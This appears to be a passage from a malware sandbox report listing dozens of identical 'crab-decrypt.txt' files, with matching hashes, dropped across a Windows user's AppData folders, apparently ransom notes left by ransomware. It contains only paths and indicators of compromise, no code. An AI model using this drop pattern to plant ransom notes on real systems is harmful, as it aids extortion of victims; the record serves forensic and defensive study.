c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\access\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\addins\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\bibliography\style\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\credentials\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\document building blocks\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\document building blocks\1033\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\document building blocks\1033\16\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\excel\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\excel\xlstart\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\forms\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\ime12\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\imjp12\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\imjp8_1\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\imjp9_0\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\quick launch\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\userdata\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\userdata\low\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\userdata\low\356bz594\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\userdata\low\n4cf7xjw\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\userdata\low\wik9myaa\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\internet explorer\userdata\low\ze5p2frt\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\mmc\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\ms project\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\ms project\16\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\ms project\16\en-us\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\network\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\network\connections\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\network\connections\pbk\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\network\connections\pbk\_hiddenpbk\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\office\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\office\recent\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\onenote\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\onenote\16.0\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\outlook\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\powerpoint\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\proof\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-2345716840-1148442690-1481144037-1000\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\publisher\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\publisher building blocks\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\speech\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\systemcertificates\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\systemcertificates\my\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\systemcertificates\my\certificates\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\systemcertificates\my\crls\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\systemcertificates\my\ctls\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\livecontent\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\livecontent\16\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\livecontent\16\managed\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\livecontent\16\managed\access parts\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\livecontent\16\managed\access parts\1033\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\livecontent\16\user\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\livecontent\16\user\document themes\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\templates\livecontent\16\user\document themes\1033\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\uproof\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\word\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\word\startup\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\extensions\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\crash reports\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\bookmarkbackups\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\healthreport\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\moz-safe-about+home\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\moz-safe-about+home\idb\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\moz-safe-about+home\idb\818200132aebmoouht\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\minidumps\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\weave\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\weave\changes\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\weave\failed\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\weave\tofetch\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\webapps\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\skype\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
